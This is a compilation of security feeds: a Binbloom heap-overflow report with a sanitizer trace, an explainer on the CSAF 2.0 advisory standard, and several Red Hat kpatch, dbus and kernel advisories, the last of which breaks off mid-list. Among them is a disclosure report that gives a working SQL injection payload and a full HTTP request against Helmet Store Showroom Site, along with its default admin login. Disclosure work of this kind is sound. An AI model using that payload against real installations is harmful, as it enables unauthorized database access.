Binbloom 2.0 was discovered to contain a heap buffer overflow via the read_pointer function at /binbloom-master/src/helpers.c.

**Description**

Some crashes occurred in function read\_pointer at binbloom-master/src/helpers.c:67:24 when running program binbloom, this can reproduce on the latest commit.

**Version**

Binbloom 2.0 latest commithttps://github.com/quarkslab/binbloom/commit/b9aada98fa98924d7d3d90e638e865df9f9a2e53 Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86\_64 x86\_64 x86\_64 GNU/Linux

**Command**

./binbloom ./POC

**Crashe**

\==487329==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010f90 at pc 0x0000004d3963 bp 0x7ffece9f22d0 sp 0x7ffece9f22c8 READ of size 4 at 0x631000010f90 thread T0 #0 0x4d3962 in read\_pointer /home/hjsz/fuzz\_software/binbloom-master/src/helpers.c:67:24 #1 0x4cc0e5 in compute\_candidates /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c:1134:21 #2 0x4d0131 in find\_base\_address /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c #3 0x4d2127 in main /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c:2102:17 #4 0x7f9ffd152082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c3ed in \_start (/home/hjsz/fuzz\_software/binbloom-master/src/binbloom+0x41c3ed)

0x631000010f91 is located 0 bytes to the right of 67473-byte region \[0x631000000800,0x631000010f91) allocated by thread T0 here: #0 0x494b2d in malloc (/home/hjsz/fuzz\_software/binbloom-master/src/binbloom+0x494b2d) #1 0x4cfd95 in find\_base\_address /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c:1655:39 #2 0x7f9ffd152082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hjsz/fuzz\_software/binbloom-master/src/helpers.c:67:24 in read\_pointer Shadow bytes around the buggy address: 0x0c627fffa1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c627fffa1f0: 00 00\[01\]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==487329==ABORTING

**Crashes and POC**

POC.zip Crashes.zip

CVE-2022-44910: CVE/Reference of Binbloom.md at main · yangfar/CVE

Version 2.0 of the Common Security Advisory Framework will enable organizations to automate vulnerability remediation.

Today, nearly every party that issues security advisories uses its own format and structure. Plus, most security advisories are only human-readable, not machine-readable.

System administrators have to read each advisory, determine if they use the products and versions listed, and evaluate the potential risk and existing mitigations. Based on their system's exposure and the business value, they make a decision about if and when to patch.

It’s a time-consuming process that delays vulnerability remediation and increases risk. Vendors and providers of software and hardware need to disclose security vulnerabilities in a way that accelerates this process and empowers customers to use automation.

**The New Standard for Security Advisories**

The Common Security Advisory Framework (CSAF) 2.0 supports the automation of vulnerability management by standardizing the creation and distribution of structured machine-readable security advisories.

CSAF is an official standard of OASIS Open. The technical committee that developed CSAF includes numerous public- and private-sector technology leaders, users, and influencers.

Manufacturers can use CSAF to standardize the format, content, distribution, and discovery of security advisories. These machine-readable JSON documents enable administrators to automate the comparison of advisories against a user’s asset database or even a supplier's software bill of materials (SBOM) database.

The automated system can filter vulnerabilities based on the products of interest and prioritize based on business value and exposure. This dramatically speeds up the evaluation process and enables administrators to focus on managing risk and fixing vulnerabilities.

**CSAF, VEX, and SBOMs**

Vulnerability Exploitability eXchange (VEX) is a profile in CSAF. VEX was developed in the SBOM community as a way for manufacturers to easily convey that a product is not affected by issuing a so-called negative security advisory. VEX is designed to work with SBOMs, although it is not necessary to have an SBOM to use VEX documents.

A VEX document must include information about the disposition of each vulnerability as it impacts each product. A product can be marked as under investigation, fixed, known affected, or known not affected. For those products that are marked as known not affected, VEX requires that the publisher include a justification for that status.

Being able to communicate the various statuses of a vulnerability — including under investigation and not affected — means customers can get that information without calling the vendors or manufacturers, which will be a relief to customer support. Moreover, it enables customers to better manage vulnerability risk.

When paired with an SBOM, VEX documents enable administrators to use asset management systems to quickly determine what vulnerabilities are not exploitable, which frees them to focus on any vulnerabilities that could put their businesses at risk.

**Other CSAF Profiles**VEX is one of five profiles in the CSAF schema. Each profile has certain required fields and is designed to address a specific need.

The CSAF base profile serves as the foundation for all of the other profiles. It defines the default required fields for any CSAF document — primarily information about the document itself, such as who published it, when it was published, and if it has been revised.

The security advisory profile includes information that we see in most security advisories today — details about the vulnerability, products affected, and remediations.

The informational advisory profile can be used to provide information about a security issue that is not a vulnerability, such as a misconfiguration.

Finally, the security incident response profile can be used to provide information about a security breach or incident that happened at the company, or about the impact that an incident involving another party (like a contractor or component manufacturer) had on the company.

**CSAF Tools and Guidance**

CSAF defines conformance targets that help consumers and producers to find the right tool for their requirements. The OASIS CSAF technical committee also developed a suite of tools for using CSAF, including:

*   Secvisogram is an online editor to create, update, and view CSAF documents. It also can produce a human-readable version of the document.
*   CSAF CMS back end is a work-in-progress implementation of a CSAF content management system. The system will support producers of CSAF documents by providing workflows and automation of metadata creation.
*   CSAF validator service is a REST-based service that implements the CSAF full validator target. It tests a given CSAF file according to the specification.
*   CSAF Provider is an implementation of the role CSAF Trusted Provider and offers a simple HTTPS-based management service. It acts as a static site generator to present CSAF files as required by the standard.
*   CSAF Checker is a tool for testing a CSAF Trusted Provider according to Section 7 of the CSAF standard. It checks requirements without considering the indicated role.
*   CSAF Downloader is a tool for downloading advisories from a CSAF provider.

To help issuing parties to write actionable CSAF documents, there is guidance for each field, which can be found here.

CSAF Is the Future of Vulnerability Management

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_product

Vulnerability location: /hss/classes/Master.php?f=delete\_product,id

dbname =hss\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46127: bug_report/SQLi-11.md at main · HMHYHM/bug_report

Red Hat Security Advisory 2022-8989-01 - The kpatch management tool provides a kernel patching infrastructure which allows you to patch a running kernel without rebooting or restarting any processes. Issues addressed include an out of bounds write vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2022:8989-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8989  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64

3. Description:

The kpatch management tool provides a kernel patching infrastructure which  
allows you to patch a running kernel without rebooting or restarting any  
processes.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_81_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_87_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_90_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_91_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_93_1-1-1.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_81_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_81_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_81_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_87_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-1.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_81_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_81_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_81_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_87_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j+CtzjgjWX9erEAQjKdQ/+MVCZUFqW0y8DiZavFLaJUEB16u37RH/Y  
r7CWGtd1er6/M73xJyYQ3UV2+lFZLgTFQuTX7rNE7GowwMtAWCHdlP2CuKKXNeEe  
PjPu2gpA5WBL/8ee9rb9CqnB1MoC3sJ+2g2I5YlB/K/QVrrmqiZc9dsh8pN34JBh  
V/ccIbd8KTjWLS8u/VUtkuRzmfwIBRvFdCDliXoOwn60UwLCebu5G4OfW8Wp8NKF  
2GGl9LuprvYUj1eIZQ+eyBxoPD98QqZNQWDgA9peAQQHQtVNyb7xYT+OzrPRit/1  
O53cG/kzG5O8q87IM5bhj7iPuo3Ryag0u46nq8PJuzePV2nqNskaLCrWTsYgdw1x  
r3htiVNBlh9uviLDaPrAzJxPW6Vhnf6OHV67Dj4aNFL7LKmmz9uKQ+0+XceaHeCg  
Fw62qYX/rgtfQiXX0EjYnrnBpJxnmGAiI3ljTZdyg+RMOf5lUQNn3IHaVOhRb6Wo  
Vuf3tm51hh8AiAJutxHkqWeaDBep+sbprWz35oYlxG05U0iDce+krEwCCurgGTbO  
c+WsJtD33sZE10hX+pNL5SLZqLyTsJCp7n2bU6GNoovPZOBG6jxjd8OSJ1hemqgR  
A0G0Bh25jSES7ZY4N5uGh629Z7DmJB3/Rcbvkj8tc+DRTfTNMPfZsQUmHbQJ7SzI  
I5BfjKeO+1k«KV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8989-01

Red Hat Security Advisory 2022-8977-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: dbus security update  
Advisory ID:       RHSA-2022:8977-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8977  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-42010 CVE-2022-42011 CVE-2022-42012  
====================================================================  
1. Summary:

An update for dbus is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

D-Bus is a system for sending messages between applications. It is used  
both for the system-wide message bus service, and as a  
per-user-login-session messaging facility.

Security Fix(es):

* dbus: dbus-daemon crashes when receiving message with incorrectly nested  
parentheses and curly brackets (CVE-2022-42010)

* dbus: dbus-daemon can be crashed by messages with array length  
inconsistent with element type (CVE-2022-42011)

* dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with  
"foreign" endianness correctly (CVE-2022-42012)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all running instances of dbus-daemon and all  
running applications using the libdbus library must be restarted, or the  
system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133616 - CVE-2022-42010 dbus: dbus-daemon crashes when receiving message with incorrectly nested parentheses and curly brackets  
2133617 - CVE-2022-42011 dbus: dbus-daemon can be crashed by messages with array length inconsistent with element type  
2133618 - CVE-2022-42012 dbus: `_dbus_marshal_byteswap` doesn't process fds in messages with "foreign" endianness correctly

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
dbus-daemon-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-devel-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-x11-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm

ppc64le:  
dbus-daemon-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-devel-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-x11-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm

s390x:  
dbus-daemon-1.12.20-5.el9_0.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.s390x.rpm  
dbus-devel-1.12.20-5.el9_0.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-x11-1.12.20-5.el9_0.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.s390x.rpm

x86_64:  
dbus-daemon-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.i686.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-devel-1.12.20-5.el9_0.1.i686.rpm  
dbus-devel-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-x11-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
dbus-1.12.20-5.el9_0.1.src.rpm

aarch64:  
dbus-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-libs-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tools-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.aarch64.rpm

noarch:  
dbus-common-1.12.20-5.el9_0.1.noarch.rpm

ppc64le:  
dbus-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-libs-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tools-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.ppc64le.rpm

s390x:  
dbus-1.12.20-5.el9_0.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.s390x.rpm  
dbus-libs-1.12.20-5.el9_0.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tools-1.12.20-5.el9_0.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.s390x.rpm

x86_64:  
dbus-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.i686.rpm  
dbus-debugsource-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-libs-1.12.20-5.el9_0.1.i686.rpm  
dbus-libs-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tools-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-5.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j9/9zjgjWX9erEAQj45g//WjO+V9yYyQWGruAmG4AUX54olkvOyC0V  
Ag4hLPeQ0h3wPdcv07ucqxY37DrzrqxXI0hbXZkrnxoN2T0rJjo8GAdPrrrOIqpV  
zZ6iqkEf+aLU5oNOrw0NAPe5oazaevy+auYsER8SeTcZb4kUbb/sNPOjI3o2QvNn  
DhudaPFsZ/hwqMTBasgqPwun4SUXHq4rv/Vh6lzS7xzRD9DRlFjSmkjcTbM+SGPO  
UNj+wRXPyaa0lQ04aRAnEPm4MlbHFe8YDy7L/KkpFeIfYxk3AloomxP/uffSQWsR  
MOywYYCwCKJ5I5qKIuW0/DlnobfOSC3J2B5tqaaCVHXy9D0NL4BiELOqVqzEjbc0  
byqF2akJgmZYOWFvbD3DYlkVkDh8utXpO9Da9JIBc8IkgkiQFicA6Xwk6qH4QYY3  
Xx2M/L/aKLmCOleL99OZ5zDMRVg2wf3kpf3e8aHQkdlf6d6XF5vELk+XH0W+N17C  
0SBL0FCQsw98WNAoY643NaR7or5bsBxhs1rjAKK0Kj/GDnyxLUTKYHB5V0O4AOEu  
Wp3/6+YubTYqvTfoGY9Zazt18naQz+uCcxnlH+/0n5CXfDmFvQc0hlJwrMSzZdaD  
4WZn8TJ6xQ9tCFb8uv1/GphEr1praGOvSd71e78hOh0vB9OLaLCrKdlBXM8lyInz  
ztf9Jrw2DnY=wGFs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8977-01

Red Hat Security Advisory 2022-8973-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow, code execution, memory leak, out of bounds write, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2022:8973-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8973  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639 CVE-2022-2959   
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166   
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-26373   
                   CVE-2022-29900 CVE-2022-29901 CVE-2022-43945   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

* kernel: watch queue race condition can lead to privilege escalation  
(CVE-2022-2959)

* kernel: nfsd buffer overflow by RPC message over TCP with garbage data  
(CVE-2022-43945)

* hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

* hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka  
SBDS) (CVE-2022-21125)

* hw: cpu: incomplete clean-up in specific special register write  
operations (aka DRPW) (CVE-2022-21166)

* hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-23816, CVE-2022-29900)

* hw: cpu: AMD: Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
(CVE-2022-26373)

* hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* sched/pelt: Fix attach_entity_load_avg() corner case (BZ#2105360)

* RHEL9[fleetwood][P9]:kdump fails to capture vmcore when crash is  
triggered while running forkoff. (BZ#2109144)

* ISST-LTE:[P10 Everest] [5.14.0-70.9.1.el9_0.ppc64le] HPT:RHEL9.0:ecolp95:  
lpar crashed at __list_del_entry_valid+0x90/0x100 and LPM failed  
(BZ#2112823)

* [rhel9] livepatch panic: RIP: 0010:0xffffffffc0e070c4  
seq_read_iter+0x124/0x4b0 (BZ#2122625)

* System crashes due to list_add double add at  
